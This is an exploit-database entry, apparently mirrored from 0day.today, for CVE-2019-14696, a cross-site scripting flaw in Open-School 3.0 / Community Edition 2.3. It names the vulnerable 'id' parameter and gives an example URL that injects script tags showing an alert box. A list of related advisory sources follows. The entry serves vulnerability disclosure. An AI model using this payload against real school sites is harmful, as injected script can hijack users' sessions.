Lucene search
Greg.Priest1337DAY-ID-33093HistoryAug 09, 2019 - 12:00 a.m.
Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting Vulnerability
2019-08-0900:00:00
Greg.Priest
0day.today
25
EPSS
0.006
Percentile
78.0%
Exploit for php platform in category web applications
Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting Vulnerability
# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://open-school.org/]
# Software Link: []
# Version: [Open-School 3.0/Community Edition 2.3]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14696]
Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.
/index.php?r=students/guardians/create&id=1[inject JavaScript Code]
Example:
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>
# 0day.today [2019-12-03] #Related
exploitpack
exploitpack
Open-School 3.0 Community Edition 2.3 - Cross-Site Scripting
2019-08-08 00:00:00
cvelist
cvelist
CVE-2019-14696
2019-08-06 15:38:29
cve
cve
CVE-2019-14696
2019-08-06 16:15:11
nuclei
nuclei
Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting
2020-09-04 15:46:07
exploitdb
exploitdb
Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting
2019-08-08 00:00:00
prion
prion
Design/Logic Flaw
2019-08-06 16:15:00
nvd
nvd
CVE-2019-14696
2019-08-06 16:15:11
packetstorm
packetstorm
Open-School 3.0 / Community Edition 2.3 Cross Site Scripting
2019-08-08 00:00:00